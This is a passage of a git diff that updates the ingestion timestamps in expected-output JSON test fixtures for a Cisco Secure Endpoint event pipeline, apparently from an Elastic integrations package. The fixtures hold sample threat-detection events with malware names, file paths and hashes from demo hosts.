@@ -3229,7 +3301,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898216500Z", + "ingested": "2021-12-14T14:40:37.784999884Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3315,7 +3387,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898222500Z", + "ingested": "2021-12-14T14:40:37.785000386Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3401,7 +3473,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898228400Z", + "ingested": "2021-12-14T14:40:37.785000887Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3481,7 +3553,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898234200Z", + "ingested": "2021-12-14T14:40:37.785001433Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3560,7 +3632,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898240100Z", + "ingested": "2021-12-14T14:40:37.785001998Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "code": "1107296272", "kind": "alert", 
@@ -3643,7 +3715,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898246200Z", + "ingested": "2021-12-14T14:40:37.785002504Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3727,7 +3799,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898252Z", + "ingested": "2021-12-14T14:40:37.785002982Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json index 2faff34a516..88436ca15f6 100644 
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -34,7 +34,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337040100Z", + "ingested": "2021-12-14T14:40:41.774804622Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -118,7 +118,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337047700Z", + "ingested": "2021-12-14T14:40:41.774807190Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -202,7 +202,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337053100Z", + "ingested": "2021-12-14T14:40:41.774807738Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -286,7 +286,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337059300Z", + "ingested": "2021-12-14T14:40:41.774808197Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -370,7 +370,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337064100Z", + "ingested": "2021-12-14T14:40:41.774808614Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -454,7 +454,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337068900Z", + "ingested": "2021-12-14T14:40:41.774809125Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -538,7 +538,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337073Z", + "ingested": "2021-12-14T14:40:41.774809594Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -622,7 +622,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337077900Z", + "ingested": "2021-12-14T14:40:41.774810012Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -706,7 +706,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337084500Z", + "ingested": "2021-12-14T14:40:41.774810427Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 